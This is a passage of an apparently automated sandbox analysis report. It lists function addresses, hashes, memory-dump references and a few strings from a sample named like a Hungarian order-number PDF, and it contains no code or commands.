                                              • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                              • API String ID: 0-2653619699
                                              • Opcode ID: 39ab8e936339ccba36bb95eb783bf4036e7b6ebb56b10d4badceb2cedc60846f
                                              • Instruction ID: 77cd086257b03b15685a5444617ebb649d170aa46f6117dd604be0fb534a6e63
                                              • Opcode Fuzzy Hash: 39ab8e936339ccba36bb95eb783bf4036e7b6ebb56b10d4badceb2cedc60846f
                                              • Instruction Fuzzy Hash: 92112CB5B00304EBF7258A4CED45F9B77A9DB94B94F5680697D04DB240D6B4CD008690
                                              Function 3358B2C0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @[e3@[e3
                                              • API String ID: 0-2406652910
                                              • Opcode ID: 141c4d8fe073b8124dc9a2885360200941b56f2e7757e5efb53f14cf56c65dc1
                                              • Instruction ID: 3a2bbaabca6bd77baf132f66bef5dde20120b81dd3f0faa1cb296fd7621ba7dd
                                              • Opcode Fuzzy Hash: 141c4d8fe073b8124dc9a2885360200941b56f2e7757e5efb53f14cf56c65dc1
                                              • Instruction Fuzzy Hash: 5332C1B5E00219DFDF14CF98E880BAEBBB9FF84714F580029E855AB391E7359901CB90
                                              Function 33561131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 2e2626f4acf319888edbc31d5652203777f8e7a2453a7c0678ca557bfdfb7a0d
                                              • Instruction ID: a7f84811dedfa6084fe02a55a5c12c38715738a94b16d7f157c7195bf30b8831
                                              • Opcode Fuzzy Hash: 2e2626f4acf319888edbc31d5652203777f8e7a2453a7c0678ca557bfdfb7a0d
                                              • Instruction Fuzzy Hash: 60B111B5A083808FD754CF68D480A1AFBF1BF88304F584A6EE899D7352D770E945CB92
                                              Function 33567370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3ed130a6e3eee8ee646245b8fb363102766178d74c25a3594403b8111f1342a
                                              • Instruction ID: 7bdf565e027c87241a581b6b017ed58b6d33c672aae68cc5b17ccd15dae61b27
                                              • Opcode Fuzzy Hash: a3ed130a6e3eee8ee646245b8fb363102766178d74c25a3594403b8111f1342a
                                              • Instruction Fuzzy Hash: AEA17975A08342CFE310CF28E480A1ABBF9BF98758F14596EF58597350EB30E945CB92
                                              Function 33567703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7ea73f0de3ecc68f5dc0689c94caf7a939d169c5391107113e086d937868a7e1
                                              • Instruction ID: 54c8c267787308d9933cc9066a0a2eb730b10283a176be7c80f9c2ffb0030cc5
                                              • Opcode Fuzzy Hash: 7ea73f0de3ecc68f5dc0689c94caf7a939d169c5391107113e086d937868a7e1
                                              • Instruction Fuzzy Hash: 99614075E01606AFEB08DF78D490A9DFBB5FF88254F28956AE419A7340DB30A941CBD0
                                              Function 3359F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4609cb3089cf95c36fcf14ea7b118db574d046d37d562020bc4502a1472c36ef
                                              • Instruction ID: 9e4152b48ac48c7c0356728193d6182183b7126831253fa1a1393a62a4652d0e
                                              • Opcode Fuzzy Hash: 4609cb3089cf95c36fcf14ea7b118db574d046d37d562020bc4502a1472c36ef
                                              • Instruction Fuzzy Hash: 44412AB4D01388AFEB15CFA9D480AEDBBF4BB48741F64416EE499E7211D7309941CFA0
                                              Function 33611AA3 Relevance: 1.6, Strings: 1, Instructions: 370COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .
                                              • API String ID: 0-248832578
                                              • Opcode ID: ee3d0c4729f0aa1c07ce42f1423172fef63f592eb1e7ad61bcd8ed5fe0e1f4e7
                                              • Instruction ID: 7b3610f8629df934793e0db15bdeef0e365b63ef5a4be1394bf69878d678919e
                                              • Opcode Fuzzy Hash: ee3d0c4729f0aa1c07ce42f1423172fef63f592eb1e7ad61bcd8ed5fe0e1f4e7
                                              • Instruction Fuzzy Hash: 58E1B079D002698FDF20CFA9C9406ADB7F5FF44740F94815AE885EB290EB749DA2CB50
                                              Function 3355B480 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 0f137f8c243078477fe0d9cc67b7a945fe21ae71af1258744b5e40a9082fb948
                                              • Instruction ID: 6d4b3b5f02fa5c3834129b16f7be7314ebf180423d91dd2752eb1cd65cc982c9
                                              • Opcode Fuzzy Hash: 0f137f8c243078477fe0d9cc67b7a945fe21ae71af1258744b5e40a9082fb948
                                              • Instruction Fuzzy Hash: 3D310272500304AFE721DF14E884A5A77B9EF853A0F54466AFD469B291EB31FD02CBD0
                                              Function 335657C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 7ab1fa1a3ae2587e9aad4ed50ca708879a8c77fa3e225f16129875b2e7a9a582
                                              • Instruction ID: 8c646df54394a2127db6fbb9399caeb0ab8fdf00b37e321e960f49c96bf8eb64
                                              • Opcode Fuzzy Hash: 7ab1fa1a3ae2587e9aad4ed50ca708879a8c77fa3e225f16129875b2e7a9a582
                                              • Instruction Fuzzy Hash: B631A136A15B46FFE7459F64EA40A89BBA5FF84358F54A425E84087F50DB34E830CBC0
                                              Function 33563616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: ee1c9f1db58d2ee5cc9c179e63144d3a3c2afedb80196bee3a667f26663f3193
                                              • Instruction ID: 9a9a057a1186476c3040e766949931d415a1eccd13130f1a141ce869514af4e1
                                              • Opcode Fuzzy Hash: ee1c9f1db58d2ee5cc9c179e63144d3a3c2afedb80196bee3a667f26663f3193
                                              • Instruction Fuzzy Hash: 382143752063509FE7619F14E988B1ABBB4FF91B68F842568E8404FA61CB70E804CFD1
                                              Function 335592FF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 463bc983f19a05f0971cbb6ab130f63ac9a21113c278abcaee67f8eb1c680c5f
                                              • Instruction ID: 4317df725e988579dfa0ba1702ba196840c06b43596b8cace5ad04a2cd40db0e
                                              • Opcode Fuzzy Hash: 463bc983f19a05f0971cbb6ab130f63ac9a21113c278abcaee67f8eb1c680c5f
                                              • Instruction Fuzzy Hash: 4BF0FA32200340AFE731DB59EC08F8ABBFDEFD4B10F09012AB54693490C7A4B909C6A0
                                              Function 3356973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                              • Instruction ID: 0a87e1c7bc60641ddca3ce7aef9b693ce666d3e47ebfe2608928f30b2bbefc90
                                              • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                              • Instruction Fuzzy Hash: 0C618AB5D00359EBEF11CFA9E840B9EFBB8FF80758F545529E810A7290D7708A01DBA0
                                              Function 335EF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                              • Instruction ID: 3077b888efe8a29c1fe4c8e4ca0d36dc37bd1284e2400e1931ea4ddc66a24664
                                              • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                              • Instruction Fuzzy Hash: A2518D72A14745AFE7118F14E840F9AB7F8FF84790F860A29B584D7690DB70DD14CB91
                                              Function 3361B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PreferredUILanguages
                                              • API String ID: 0-1884656846
                                              • Opcode ID: 9f7197e158e79325958ca61d47a7a08c6ee26bddac5ab0eb5b749c2172fec2a5
                                              • Instruction ID: c56af2edbc719769ac22eb4cb56780ec0c1781070343d4f962c9dc4f98af1c70
                                              • Opcode Fuzzy Hash: 9f7197e158e79325958ca61d47a7a08c6ee26bddac5ab0eb5b749c2172fec2a5
                                              • Instruction Fuzzy Hash: D741E176D00319AFDF01DAA4C980BEEB7B9EF84750F45416AE841EB250DBB0DE60C7A1
                                              Function 335E97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: verifier.dll
                                              • API String ID: 0-3265496382
                                              • Opcode ID: 5239701e1b50c22aed8b081e07b7b3a17cd6841eb406ddbbe2d0ea8680298e3e
                                              • Instruction ID: 2c653ed7d15c9c011145c5ffd28a168adbd1729c6b9d72a77d8ffa52fbcab0a0
                                              • Opcode Fuzzy Hash: 5239701e1b50c22aed8b081e07b7b3a17cd6841eb406ddbbe2d0ea8680298e3e
                                              • Instruction Fuzzy Hash: 2431D8B5B04301AFE714DF28E860BA677E9EB88350F94447AEA85DF391E7358C81C794
                                              Function 33597505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #
                                              • API String ID: 0-1885708031
                                              • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                              • Instruction ID: 1814d86979418bdf6d4583605f5e4712e763ccfbb4ab5eaa256a8fe303cfa5cc
                                              • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                              • Instruction Fuzzy Hash: 5941A079A00616DBEB55CF48E890BFEB7B9EF84741F44445AE94297240DB30D981CBE1
                                              Function 3359D530 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ge3
                                              • API String ID: 0-3248300583
                                              • Opcode ID: cbabdd3f876e7497e480fa59169713b6e24f47960d44b80e03c905a017e4f4b2
                                              • Instruction ID: 4375c2e959b9077457b42f3d8723549331052485b89dff35dfe8a49038ab811f
                                              • Opcode Fuzzy Hash: cbabdd3f876e7497e480fa59169713b6e24f47960d44b80e03c905a017e4f4b2
                                              • Instruction Fuzzy Hash: 8521E2B2905304AFE711EF69E940F5A77F8AF95654F81082AF944DBA94EB30D804C7E2
                                              Function 33565096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx
                                              • API String ID: 0-89312691
                                              • Opcode ID: e3ffc3368abbe3b89903a5aeaa8c26f36c99038e4e1bec896239a01f5e970ae7
                                              • Instruction ID: a986ebfbb820d50de957cde0513f2552d276b8daf8b238c4c364e743fd2f424a
                                              • Opcode Fuzzy Hash: e3ffc3368abbe3b89903a5aeaa8c26f36c99038e4e1bec896239a01f5e970ae7
                                              • Instruction Fuzzy Hash: FB11D078788B428BF7144E08B850616B3D9EB8527CF38AD3AE4D0CB390DA71D841C380
                                              Function 335E106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrCreateEnclave
                                              • API String ID: 0-3262589265
                                              • Opcode ID: d89f22b42122580e0b022717171921b96235b72a59d02c5a1db1f7618782c5d7
                                              • Instruction ID: f28098274e5bcc2b55ef7ec8f2986bd1bbc79d37c40320fd16d79238658a7cc8
                                              • Opcode Fuzzy Hash: d89f22b42122580e0b022717171921b96235b72a59d02c5a1db1f7618782c5d7
                                              • Instruction Fuzzy Hash: 0B2104B19083849FD310CF1AD844A9FFBE8ABD5B50F404A1FF59497250D7B09545CB92
                                              Function 335B739A Relevance: .7, Instructions: 705COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 910c26954ee1befe75c961d577187773b0dba90b1f2264c0d58ea626c321fe46
                                              • Instruction ID: a416456c2012f5235dfc9d58e5fdaa8098105b1c7aa640d36de51958d413a32e
                                              • Opcode Fuzzy Hash: 910c26954ee1befe75c961d577187773b0dba90b1f2264c0d58ea626c321fe46
                                              • Instruction Fuzzy Hash: 7C42C275A006168FDF04CF59D480AAEB7F6FF88354F68855DE452AB780DB34E942CB90
                                              Function 336216CC Relevance: .6, Instructions: 571COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d0fc129fc5ae0671fd90a3e1f2c1fb0250f45add7ed2c6e8051d0b9d39f50ce9
                                              • Instruction ID: 8a231981a95725dce3985aa3049468833e296ad3471b9d496db8a2f647a83f4b
                                              • Opcode Fuzzy Hash: d0fc129fc5ae0671fd90a3e1f2c1fb0250f45add7ed2c6e8051d0b9d39f50ce9
                                              • Instruction Fuzzy Hash: 9822C078B042168FDB09CF59C580AAEBBB2BF88344F6A456DD855DB340DB34E942CF91
                                              Function 3356D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5074075af8b74bfb3291be5f9f8c3ddf87ec30fe753a258719a6519567064924
                                              • Instruction ID: 41fa1ad24762de87ffe3791b7ad0074d8d9b7e81811af874681634ca7f0f494f
                                              • Opcode Fuzzy Hash: 5074075af8b74bfb3291be5f9f8c3ddf87ec30fe753a258719a6519567064924
                                              • Instruction Fuzzy Hash: A1C1F2B4E003469FEB14CF99D840BAEB7F5EF84359F588669D851BB280D770E981CB80
                                              Function 3357F460 Relevance: .3, Instructions: 321COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6561ed759f25591c116224de833285e1b05af54c9c74333c169db306cb90559f
                                              • Instruction ID: 9471f27403df869aca31d17521fb1a461bec16cb517dcee8713ef8dadbc3005e
                                              • Opcode Fuzzy Hash: 6561ed759f25591c116224de833285e1b05af54c9c74333c169db306cb90559f
                                              • Instruction Fuzzy Hash: DEC125B5A01321CFEB14CF18E490B79B7B1FF84754F594269E8A1DB3A5EB308941CBA0
                                              Function 335890DB Relevance: .3, Instructions: 287COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
